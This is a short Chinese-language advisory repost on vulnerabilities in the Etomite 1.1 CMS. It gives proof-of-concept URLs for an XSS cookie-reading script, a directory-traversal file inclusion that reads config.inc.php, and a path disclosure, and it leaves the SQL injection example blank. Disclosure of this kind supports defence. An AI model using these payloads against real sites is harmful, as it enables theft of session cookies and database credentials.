电脑资料
当前位置:资料库>电脑资料>
我要投稿 投诉建议

Etomite 1.1 SQL,XSS,文件包含漏洞及修复 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

    由于该漏洞存在于“/index.php”的脚本没有经过过滤就提供搜索变量的输入,

Etomite 1.1 SQL,XSS,文件包含漏洞及修复

。攻击者可以修改应用程序SQL查询到数据库,执行任意查询数据库,妥协的应用程序,访问或修改敏感数据,或利用底层的SQL数据库中的各种漏洞。

    SQL注入:

    POC:

   

   

   

   

    XSS跨站:

    POC:

    http://www.hackqing.com/manager/index.php?location=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

    本地文件包含:

    由于该漏洞存在于“/manager/actions/static/ document_data.static.action.php”,远程用户可以查看任何本地文件,

电脑资料

Etomite 1.1 SQL,XSS,文件包含漏洞及修复》(https://www.unjs.com)。

    http://www.hackqing.com/manager/actions/static/document_data.static.action.php?id=/../../../../includes/config.inc.php%00

    敏感信息泄漏:爆物理路径

    由于该漏洞存在于“/ manager/frames/3.php”脚本失败,有可能产生错误,从而揭开了脚本的完整路径。远程用户可以决定到Web根目录和其他潜在的敏感信息的完整路径。

    POC:http://www.hackqing.com/manager/frames/3.php

    form.:High-Tech Bridge ,由情整理编辑

    修复方案:过滤

相关文章
最新文章
推荐文章

Copyright©2006-2026 优文网 unjs.com 版权所有 手机版